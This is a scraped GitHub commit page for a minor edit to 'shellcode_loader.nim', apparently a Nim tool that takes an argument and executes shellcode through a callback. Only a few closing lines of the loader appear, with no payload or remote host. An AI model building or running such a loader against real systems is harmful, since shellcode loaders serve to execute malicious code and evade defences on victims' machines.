Skip to content

Commit

Permalink
Update shellcode_loader.nim
Browse files Browse the repository at this point in the history
  • Loading branch information
sh3d0ww01f authored Apr 1, 2022
1 parent 66f8b68 commit 8c0c903
Showing 1 changed file with 2 additions and 1 deletion.
3 changes: 2 additions & 1 deletion shellcode_loader.nim
Original file line number Diff line number Diff line change
Expand Up @@ -68,4 +68,5 @@ proc GetShellcodeAndRun(para:string):void=
shellcodeCallback(shellcode)
if paramCount()>=1:
var para:string=paramStr(1)
GetShellcodeAndRun(para)
GetShellcodeAndRun(para)

0 comments on commit 8c0c903

Please sign in to comment.